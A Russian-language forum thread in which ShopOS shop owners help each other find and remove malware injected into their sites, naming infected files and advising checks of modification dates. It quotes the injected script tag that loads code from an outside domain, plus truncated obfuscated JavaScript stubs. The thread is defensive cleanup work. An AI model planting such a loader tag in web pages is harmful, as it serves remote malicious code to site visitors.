Как найти вирус в скрипте?
Подцепилась какая-то зараза:
</div>
<!-- /Низ -->
<center><span style="font-size:7px;color:#999999;">© ShopOS 2012<br />Скрипты </span><a href="http://www.shopos.ru/" alt="Скрипты интернет-магазина" style="font-size:7px;color:#999999;">интернет-магазина</a></center></body></html><script language='JavaScript' src='http://uni33.ru/codenj.php?codenj=23311'></script>
В файле index.php этого нет.
Такое ощущение, что это в файле, в котором прописаны строки:
© ShopOS 2012
Скрипты интернет-магазина
Кто подскажет, где эту кракозябру найти и выкинуть, а то антивирусник скоро охрипнет от крика...
Заранее благодарен за ответы.
Только сегодня такое удалял.
в файле includes/bottom.php эта зараза.
еще и другие могут быть. в products_info.php еще внизу находил.
и в папке admin\includes\javascript\json.js вроде был. может есть у вас. Это файл удалить нужно
а так смотрите файлы по датам изменения. если седня появилось, то и дата изменения файла будет сегодняшняя. эти файлы и смотрите и папки.
Спасибо большое, сейчас попробую найти.
Эпидемия очередная. Вчера на нескольких сайтах удалял такое.
Еще во многих файлах .js появились в конце длинные строки типа
var y4ccd99f="";function he7e95b0e864(){ ...}
var s9a980="";function he7e95b0e864(){ ...}
var i7bf6a0="";function he7e95b0e864(){ ...}
var va6a89="";function he7e95b0e864(){ ...}
Эпидемия очередная. Вчера на нескольких сайтах удалял такое. Еще во многих файлах .js появились в конце длинные строки типа
var y4ccd99f="";function he7e95b0e864(){ ...}
var s9a980="";function he7e95b0e864(){ ...}
var i7bf6a0="";function he7e95b0e864(){ ...}
var va6a89="";function he7e95b0e864(){ ...}
как они туда попадают? Надо дыры закрывать в скрипте.
как они туда попадают? Надо дыры закрывать в скрипте.
http://www.shopos.ru/forum/index.php?topic=6706.0
Источник
|
